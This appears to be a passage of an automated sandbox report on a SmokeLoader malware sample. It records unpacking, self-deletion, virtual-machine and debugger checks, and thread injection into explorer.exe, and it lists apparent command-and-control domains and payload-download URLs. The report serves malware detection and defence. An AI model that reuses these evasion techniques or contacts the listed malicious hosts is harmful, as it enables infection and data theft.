            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: EBC4.exe, 00000007.00000002.489007839.0000000000410000.00000040.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000002.507739087.0000000000410000.00000040.00000001.01000000.00000009.sdmp
            Source: Binary string: C:\cine\zu.pdb source: EBC4.exe, 00000007.00000000.479192618.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe, 0000000C.00000000.488527200.0000000000401000.00000020.00000001.01000000.00000009.sdmp, EBC4.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: BC:\supohizoza_pujuvi\reyo fewokelobivuvi80\yahomizidita\huhise.pdb` source: B87E.exe, 00000005.00000000.450920035.0000000000401000.00000020.00000001.01000000.00000007.sdmp, B87E.exe.1.dr
            Source: Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: EBC4.exe, 0000000C.00000002.564623481.0000000004E74000.00000004.00000800.00020000.00000000.sdmp, EBC4.exe, 0000000C.00000002.514725083.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Data Obfuscation

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\gfgsrbsUnpacked PE file: 4.2.gfgsrbs.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F47 push eax; ret 0_2_00402F82
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F7D push eax; ret 0_2_00402F82
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402183 push ecx; iretd 0_2_004024FA
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4C1 push ecx; ret 0_2_0040B4D4
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FE12 pushfd ; retn 0042h0_2_0040FE19
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F47 push eax; ret 4_2_00402F82
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F7D push eax; ret 4_2_00402F82
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402183 push ecx; iretd 4_2_004024FA
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040B4C1 push ecx; ret 4_2_0040B4D4
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040FE12 pushfd ; retn 0042h4_2_0040FE19
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_005002EA push edx; ret 5_2_00500312
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FD4B6 push 004C035Dh; ret 5_2_004FD5A8
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004705D7 push 00469469h; ret 5_2_00470B5E
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B4A9B push dword ptr [0050A270h]; ret 5_2_004B4D20
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046DB68 push 00468D9Fh; ret 5_2_0046DD21
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F5B91 push 0046744Ah; ret 5_2_004F5CE6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F7C82 push 004DE9FCh; ret 5_2_004F7D09
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 push dword ptr [00509C28h]; ret 5_2_004B0451
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FCD16 push 004C6FD6h; ret 5_2_004FCF23
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E0DEB push 004C2A98h; ret 5_2_004E11D5
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046CE82 push 00469BBCh; ret 5_2_0046CF3C
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B0FC1 push 00469BBCh; ret 5_2_004B0FE7
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_00501FF9 push 004C3C47h; ret 5_2_005021F6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0047E041 push 00468197h; ret 5_2_0047E22C
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BE04C push 00469D4Eh; ret 5_2_004BE091
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E push 0046624Ah; ret 5_2_0046A3CD
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FA045 push 004EF3F6h; ret 5_2_004FA064
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046B049 push dword ptr [0050A068h]; ret 5_2_0046B0E6
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004DC054 push 004C3B4Eh; ret 5_2_004DC143
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AD068 push 0046744Ah; ret 5_2_004AD259
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF06F push 00469469h; ret 5_2_004AF084
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeFile created: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B87E.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EBC4.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Deletes itself after installation
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gfgsrbs:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Windows\explorer.exe TID: 5148Thread sleep count: 640 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 5112Thread sleep count: 1133 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 5112Thread sleep time: -113300s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 412Thread sleep count: 1284 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 412Thread sleep time: -128400s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 4848Thread sleep count: 507 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep count: 1067 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep time: -106700s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 4136Thread sleep count: 1183 > 30Jump to behavior
            Source: C:\Windows\explorer.exe TID: 4136Thread sleep time: -118300s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe TID: 3004Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 640Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1133Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1284Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 507Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1067Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1183Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeFile opened: PHYSICALDRIVE0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeAPI coverage: 7.4 %
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 136000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000001.00000000.358870858.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
            Source: explorer.exe, 00000001.00000000.380325701.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
            Source: explorer.exe, 00000001.00000000.329406422.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000001.00000000.360871692.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
            Source: explorer.exe, 00000001.00000000.359904103.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EBC4.exe, 0000000C.00000002.515660942.0000000002E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8

            Anti Debugging

            barindex
            Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
            Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSystem information queried: CodeIntegrityInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0226092B mov eax, dword ptr fs:[00000030h]0_2_0226092B
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02260D90 mov eax, dword ptr fs:[00000030h]0_2_02260D90
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_023E80A3 push dword ptr fs:[00000030h]5_2_023E80A3
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsProcess queried: DebugPortJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: gfgsrbs.1.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
            Source: C:\Windows\explorer.exeDomain query: freeshmex.at
            Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 46319C8Jump to behavior
            Source: C:\Users\user\AppData\Roaming\gfgsrbsThread created: unknown EIP: 4A619C8Jump to behavior
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.329316719.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000001.00000000.348621361.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318266045.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.368523478.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B544E GetLocalTime,5_2_004B544E

            Stealing of Sensitive Information

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		32
            Process Injection            		11
            Masquerading            		1
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Input Capture            		Exfiltration Over Other Network Medium21
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		141
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Query Registry            		Remote Desktop Protocol11
            Archive Collected Data            		Exfiltration Over Bluetooth11
            Ingress Tool Transfer            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
            Process Injection            		Security Account Manager321
            Security Software Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Hidden Files and Directories            		NTDS141
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput CaptureScheduled Transfer124
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information            		LSA Secrets3
            Process Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Rundll32            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Software Packing            		DCSync14
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            File Deletion            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 753427 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 5 other signatures 2->58 8 file.exe 2->8         started        11 gfgsrbs 2->11         started        13 EBC4.exe 2->13         started        process3 signatures4 66 Detected unpacking (changes PE section rights) 8->66 68 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->68 70 Maps a DLL or memory area into another process 8->70 15 explorer.exe 6 8->15 injected 72 Machine Learning detection for dropped file 11->72 74 Checks if the current machine is a virtual machine (disk enumeration) 11->74 76 Creates a thread in another existing process (thread injection) 11->76 process5 dnsIp6 38 123.253.32.170, 49701, 80 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Malaysia 15->38 40 thepokeway.nl 5.135.247.111, 443, 49715 OVHFR France 15->40 42 8 other IPs or domains 15->42 28 C:\Users\user\AppData\Roaming\gfgsrbs, PE32 15->28 dropped 30 C:\Users\user\AppData\Local\TempBC4.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\Local\Temp\B87E.exe, PE32 15->32 dropped 34 C:\Users\user\...\gfgsrbs:Zone.Identifier, ASCII 15->34 dropped 44 System process connects to network (likely due to code injection or exploit) 15->44 46 Benign windows process drops PE files 15->46 48 Deletes itself after installation 15->48 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->50 20 B87E.exe 1 15->20         started        24 EBC4.exe 15->24         started        file7 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\Tdryuqayh.tmp, PE32 20->36 dropped 60 Detected unpacking (changes PE section rights) 20->60 62 Detected unpacking (overwrites its own PE header) 20->62 64 Machine Learning detection for dropped file 20->64 26 rundll32.exe 1 20->26         started        signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            file.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gfgsrbs100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\EBC4.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\B87E.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp24%ReversingLabsWin32.Trojan.Lazy
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp35%VirustotalBrowse

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.EBC4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.B87E.exe.25d0e67.1.unpack100%AviraHEUR/AGEN.1215461Download File
            4.3.gfgsrbs.7b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            12.2.EBC4.exe.2d5112c.2.unpack100%AviraTR/Patched.Ren.Gen7Download File
            0.3.file.exe.2270000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.3.B87E.exe.26f0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
            12.2.EBC4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.gfgsrbs.7a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.gfgsrbs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.file.exe.2260e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.B87E.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File

            Domains

            SourceDetectionScannerLabelLink
            thepokeway.nl5%VirustotalBrowse
            freeshmex.at19%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://piratia.su/tmp/100%URL Reputationmalware
            http://piratia.su/tmp/100%URL Reputationmalware
            https://thepokeway.nl/upload/index.php0%URL Reputationsafe
            https://thepokeway.nl/upload/index.php0%URL Reputationsafe
            http://cracker.biz/tmp/0%URL Reputationsafe
            http://freeshmex.at/tmp/0%URL Reputationsafe
            http://123.253.32.170/root2.exe0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            thepokeway.nl
            		5.135.247.111
            		truetrueunknown
            freeshmex.at
            		190.140.74.43
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://piratia.su/tmp/true
            • URL Reputation: malware
            • URL Reputation: malware
            		unknown
            https://thepokeway.nl/upload/index.phpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://cracker.biz/tmp/true
            • URL Reputation: safe
            		unknown
            http://freeshmex.at/tmp/true
            • URL Reputation: safe
            		unknown
            http://123.253.32.170/root2.exetrue
            • URL Reputation: safe
            		unknown
            http://piratia-life.ru/tmp/false
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              178.31.176.42
              		unknownSweden
              		2119TELENOR-NEXTELTelenorNorgeASNOfalse
              109.102.255.230
              		unknownRomania
              		9050RTDBucharestRomaniaROfalse
              5.135.247.111
              		thepokeway.nlFrance
              		16276OVHFRtrue
              211.40.39.251
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRfalse
              211.171.233.129
              		unknownKorea Republic of
              		3786LGDACOMLGDACOMCorporationKRfalse
              123.253.32.170
              		unknownMalaysia
